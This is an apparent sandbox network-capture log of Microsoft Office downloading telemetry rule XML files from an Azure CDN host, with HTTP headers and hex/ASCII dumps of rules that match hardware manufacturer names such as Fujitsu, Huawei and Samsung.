                                                                                                                                                                                                        2024-12-02 06:38:50 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        37192.168.2.84984113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:51 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:52 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                        x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063852Z-174f7845968cpnpfhC1EWR3afc00000013p0000000007hyt
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        38192.168.2.84984313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:51 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:52 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                        x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063852Z-174f7845968px8v7hC1EWR08ng00000014ag000000005e74
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        39192.168.2.84984413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:52 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                        x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063852Z-174f7845968vqt9xhC1EWRgten000000140000000000dpcn
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        40192.168.2.84984513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:52 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                        x-ms-request-id: 7732d518-401e-0035-4c64-4482d8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063852Z-174f7845968psccphC1EWRuz9s00000014ag000000004vt0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:52 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        41192.168.2.84984213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:53 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:53 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                        x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063853Z-174f7845968frfdmhC1EWRxxbw0000001460000000001yc7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        42192.168.2.84984713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                        x-ms-request-id: e21e9151-601e-0097-6ab4-42f33a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063854Z-174f78459684db9fhC1EWRc7g400000003z000000000d1r9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        43192.168.2.84984613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                        x-ms-request-id: f843b097-901e-00ac-53c3-43b69e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063854Z-174f7845968cpnpfhC1EWR3afc00000013s00000000031sm
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        44192.168.2.84984813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                        x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063854Z-174f7845968qj8jrhC1EWRh41s00000013xg00000000bp1c
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        45192.168.2.84984913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                        x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063854Z-174f7845968cdxdrhC1EWRg0en0000001430000000002fzv
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        46192.168.2.84985013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:55 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
